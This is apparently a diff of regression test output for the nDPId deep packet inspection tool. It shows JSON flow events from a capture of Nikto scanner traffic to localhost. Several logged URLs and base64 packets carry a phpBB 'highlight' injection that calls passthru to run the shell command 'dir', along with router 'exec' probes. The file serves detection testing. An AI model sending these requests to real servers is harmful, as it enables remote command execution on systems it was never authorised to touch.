00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277734,"pkt":"AAAAAAAAAAAAAAAACABFAADISBNAAEAG9Bp\/AAABfwAAAcaiH5A0bnEJpPWxcYAYAED+vAAAAQEICp1m\/w6dZv8OR0VUIC9sZXZlbC85Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":644,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/96\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001343)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277736,"pkt":"AAAAAAAAAAAAAAAACABFAADIC2JAAEAGMMx\/AAABfwAAAcakH5C2tzJ7p90VYYAYAED+vAAAAQEICp1m\/xCdZv8PR0VUIC9sZXZlbC85Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} -01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 